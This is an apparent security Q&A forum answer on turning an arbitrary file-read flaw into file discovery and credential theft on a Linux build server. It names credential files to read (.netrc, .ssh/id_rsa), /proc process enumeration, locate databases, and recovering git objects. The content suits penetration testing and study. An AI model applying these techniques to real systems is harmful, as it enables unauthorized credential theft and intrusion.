How to list all files with only arbitrary file path read, but no directory listing nor sudo?
You can try other locate implementations that index world-accessible files in a world-readable index, typically located at /var/lib/locate/locatedb
or /var/cache/locate/locatedb
or some such.
I don't see a lot of need for file listing to escalate your access on a typical server. Usually you'd know what application you're attacking and retrieve its configuration files and its database and obtain credentials this way. You might try files such as .netrc
, .ssh/id_rsa
and .ssh/config
to see if the account can be a gateway into other accounts. If you aren't sure what may be running on the box, try lots and lots of plausible file names.
The one thing that's a bit long to exhaust is the PID values, to explore what's running. It takes 32k requests to exhaust pid_t
under Linux by default, and you can check the maximum value in /proc/sys/kernel/pid_max
. The command line is in /proc/PID/cmdline
; you don't get to see the list of open files (you need readlink
for that) but you can see their content (cat /proc/PID/fd/0
…).
For the specific case of a build service, do check the configuration files of that service. That should help you locate the git repository. If you've been able to locate a git checkout, look in .git/index
and .git/logs/HEADS
and perhaps other files in .git/logs
(experiment with that service to see which branches are used and what operations it uses). This should let you retrieve object IDs which you can then read from .git/objects
.
Other than finding a locate database, I can't think of a way to elevate read-files access into list-files with a typical configuration.